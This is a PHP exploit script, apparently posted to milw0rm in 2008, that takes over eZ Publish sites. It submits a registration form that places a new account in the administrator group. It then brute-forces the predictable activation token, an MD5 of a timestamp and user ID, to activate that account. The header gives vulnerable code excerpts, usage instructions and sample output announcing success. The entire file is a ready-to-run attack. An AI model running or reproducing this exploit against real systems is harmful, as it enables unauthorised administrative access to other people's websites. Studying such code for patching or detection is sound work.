<?php
/*
eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru]
Versions affected >= 3.5.6
eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1
More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
eZ Publish weak activation token for new user not resolved now (zero-day).
Vulnerable code in the version 3.9.2:
$hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) );
Vulnerable code in the version 4.0.1:
$hash = md5( time() . $user->attribute( 'contentobject_id' ) );
* tested on version 3.9.2
usage:
# ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
The options are required:
-u Login of the new admin on eZ Publish
-p Password of the new admin on eZ Publish
-s Target for privilege escalation
The options are optional:
-t Unix timestamp for a date on target eZ Publish server
This option is required in a case when on a target server incorrect time is established.
Default is unix timestamp for a date on local computer.
-e Email of the new admin on eZ Publish
Default is anybody@localhost.localhost.
example:
# ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235
[+] Phase 1 successfully finished
[+] Use timestamp: 1229194235
[+] Begin bruteforce...
....................
[+] Phase 2 successfully finished
[+] Exploiting is finished successfully
[+] Login in system using admin/P@ssw0rd
*/
function help_argc($script_name)
{
print "
usage:
# ./".$script_name." -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
The options are required:
-u Login of the new admin on eZ Publish
-p Password of the new admin on eZ Publish
-s Target for privilege escalation
The options are optional:
-t Unix timestamp for a date on target eZ Publish server
(default is unix timestamp for a date on local computer)
-e Email of the new admin on eZ Publish
(default is anybody@localhost.localhost)
example:
# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/
[+] Phase 1 successfully finished
[+] Use timestamp: 1229194235
[+] Begin bruteforce...
....................
[+] Phase 2 successfully finished
[+] Exploiting is finished successfully
[+] Login in system using admin/P@ssw0rd
";
}
function successfully($login,$password)
{
print "
[+] Phase 2 successfully finished
[+] Exploiting is finished successfully
[+] Login in system using $login/$password
";
}
if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
help_argc($argv[0]);
exit(0);
}
else
{
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg,1,1);
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
}
}
if ($ARG[u] && $ARG[p] && $ARG[s])
{
if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost";
$post_fields = array(
'ContentObjectAttribute_data_user_login_30' => $ARG[u],
'ContentObjectAttribute_data_user_password_30' => $ARG[p],
'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
'ContentObjectAttribute_data_user_email_30' => $ARG[e],
'UserID' => '14',
'PublishButton' => '1'
);
$headers = array(
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
'Referer' => $ARG[s]
);
$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
$res_http->addPostFields($post_fields);
$res_http->addHeaders($headers);
try {
if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); }
$response = $res_http->send()->getBody();
if (eregi("success", $response) || eregi("Fatal error", $response))
{
print "[+] Phase 1 successfully finished\n";
print "[+] Use timestamp: $time\n";
print "[+] Begin bruteforce...\n";
for ($i = $time; $i<$time+100; $i++)
{
print ".";
$hash = md5( $i . "14" );
$res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET);
$res_http->addHeaders($headers);
try {
$response = $res_http->send()->getBody();
if (eregi("Your account is now activated", $response))
{
successfully($ARG[u],$ARG[p]);
exit(1);
}
} catch (HttpException $exception) {
print "\n[-] Not connected";
exit(0);
}
}
print "\n[-] Exploit failed";
}
else
{
print "[-] Exploit failed";
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
}
else
{
help_argc($argv[0]);
exit(0);
}
}
?>
# milw0rm.com [2008-12-15]